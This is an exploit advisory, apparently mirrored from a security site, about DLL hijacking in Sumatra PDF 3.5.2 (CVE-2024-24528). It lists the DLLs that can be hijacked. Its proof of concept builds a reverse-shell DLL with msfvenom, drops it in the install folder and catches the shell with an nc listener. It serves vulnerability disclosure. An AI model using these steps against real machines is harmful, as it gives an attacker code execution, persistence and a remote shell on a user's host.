Sumatra PDF 3.5.2 DLL Hijacking
2024-2-7 04:34:55 Author: cxsecurity.com(查看原文) 阅读量:15 收藏

Sumatra PDF 3.5.2 DLL Hijacking

# Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking # Date: 06.02.2024 # Exploit Author: Ravishanka Silva # Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader # Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer # Version: 3.5.2 # Tested on: Windows 10, Windows 11 # CVE : CVE-2024-24528 Description: Sumatra PDF is a free and open-source document viewer for Windows. It is a lightweight and minimalistic application designed to quickly and efficiently view PDF, eBook (ePub, Mobi), XPS, DjVu, CHM, and comic book (CBZ and CBR) files. Key features of Sumatra PDF include its fast startup and rendering speed, support for a variety of document formats, and a user-friendly interface. While it may not have all the advanced features found in some other PDF viewers, Sumatra PDF is a popular choice for users who prioritize speed and simplicity in a document viewer. A DLL Hijacking vulnerability exists in Sumatra PDF Version 3.5.2 which allows a local attacker to execute arbitrary code and obtain a certain level of persistence on the compromised host, in the context of current logged-in user, by placing a crafted DLL in the installation directory, resulting in the hijacking of the following DLL files: dbgcore.DLL profapi.dll PROPSYS.dll TextShaping.dll DWrite.dll Proof of Concept: 1. Create a malicious .dll file via msfvenom, msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o dbgcore.DLL 2. Place the malicious DLL inside the Sumatra PDF installation folder. (Usually "C:\Users\<username>\AppData\Local\SumatraPDF") 3. Start a listener via nc, nc -lvp 7777 4. Open Sumatra PDF application, and observe the execution of the reverse shell. Demo: https://drive.google.com/file/d/1-OMJ0ZvR9TYJEg_AwspRcGEAQvOLHJ41/view?usp=sharing



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2024, cxsecurity.com

Back to Top


文章来源: https://cxsecurity.com/issue/WLB-2024020032
如有侵权请联系:admin#unsafe.sh